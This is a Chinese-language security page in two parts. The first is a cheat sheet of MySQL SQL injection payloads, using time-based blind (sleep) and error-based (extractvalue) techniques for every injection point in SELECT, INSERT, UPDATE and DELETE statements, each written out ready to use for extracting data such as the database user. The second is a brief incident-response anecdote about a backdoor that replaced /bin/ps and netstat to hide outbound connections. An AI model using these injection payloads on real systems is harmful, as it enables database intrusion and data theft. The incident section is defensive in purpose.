mysql各种注入点盲注/报错利用方法

1.select
(1)”select “.$sqli.” from test_1 where id=1;”
select name and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) from test_1 where id=1;
select name or extractvalue(1,concat(0x7e,(select user()))) from test_1 where id=1;
(2)”select name from “.$sqli.”_1 where id=1;”
select name from (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a)b_1 where id=1;
(3)”select name from test_”.$sqli.” where id=1;”
select name from test_1,(select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a where id=1;
(4)”select name from test_1 where id=”.$sqli.”;”
select name from test_1 where id=1 and if(ascii(substr((select user()),1,1))=114,sleep(2),0);
select name from test_1 where id=1 or extractvalue(1,concat(0x7e,(select user())));
(5)”select name,pass from test_1 where id=1 group by “.$sqli.”;”
select name,pass from test_1 where 1=1 group by name and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name,pass from test_1 where 1=1 group by name or extractvalue(1,concat(0x7e,(select user())));
(6)”select name,pass from test_1 where id=1 group by name asc “.$sqli.”;”
select name,pass from test_1 where 1=1 group by name asc,(select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name,pass from test_1 where 1=1 group by name asc,extractvalue(1,concat(0x7e,(select user())));
(7)”select name,pass from test_1 where id=1 group by name asc having name='”.$sqli.”‘;”
select name,pass from test_1 where id=1 group by name asc having name=’tttt’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′;
select name,pass from test_1 where id=1 group by name asc having name=’tttt’ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′;
(8)”select name,pass from test_1 where id=1 group by name asc having name=’tttt’ order by “.$sqli.”;”
select name from test_1 where id=1 order by 1 and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name from test_1 where id=1 order by 1 or extractvalue(1,concat(0x7e,(select user())));
(9)”select name,pass from test_1 where id=1 group by name asc having name=’tttt’ order by 1 asc “.$sqli.”;”
select name from test_1 where id=1 order by 1 asc,(select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a);
select name from test_1 where id=1 order by 1 asc,extractvalue(1,concat(0x7e,(select user())));
(10)”select name,pass from test_1 where id=1 group by name asc having name=’name’ order by 1 asc limit 1,”.$sqli.”;”
select name,pass from test_1 where id=1 order by name limit 1,1 procedure analyse(extractvalue(1,concat(0x7e,user())),1);
2.insert/update/delete
(1)”insert into test_1(name, pass) values(‘tttt’, ‘”.$sqli.”‘);”)
insert into test_1(name,pass) values(‘tttt’,’1′ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′);
insert into test_1(name,pass) values(‘tttt’,’1′ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′);
(2)”update test_1 set pass='”.$sqli.”‘ where name=’tttt’;”
update test_1 set pass=’pass’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′ where name=’tttt’;
update test_1 set pass=’pass’ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′ where name=’tttt’;
(3)”update test_1 set pass=’pass’ where name='”.$sqli.”‘;”
update test_1 set pass=’pass’ where name=’pass’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′;
update test_1 set pass=’pass’ where name=’pass’ or extractvalue(1,concat(0x7e,(select user())));
(4)”delete from test_1 where name='”.$sqli.”‘;”
delete from test_1 where name=’tttt’ and (select * from (select(if(ascii(substr((select user()),1,1))=114,sleep(2),0)))a) and ‘1’=’1′;
delete from test_1 where name=’tttt’ or extractvalue(1,concat(0x7e,(select user()))) and ‘1’=’1′;

系统命令被替换

前几天的一次应急，客户的漏洞没有及时修复，短短几天就又被攻陷了。

排查时看到几个异常连接，找到了对应的进程，结束掉之后发现仍然能抓到往攻击者IP发送的包，但就是看不到对应的进程，很奇怪。

在老司机的指点下，看了下/bin/ps，原来已经被攻击者替换掉了——这也解释了为什么前面有外发流量却看不到对应进程：受感染主机上自带的命令输出已经不可信，需要用可信介质上的工具来核查。

和队友一起把这个假的ps拿出来分析了一下，发现似乎是网上可以找到的名为billgates的后门，其功能之一就是替换netstat、ps、lsof等系统命令。

链接:http://sec.chinabyte.com/213/13664713.shtml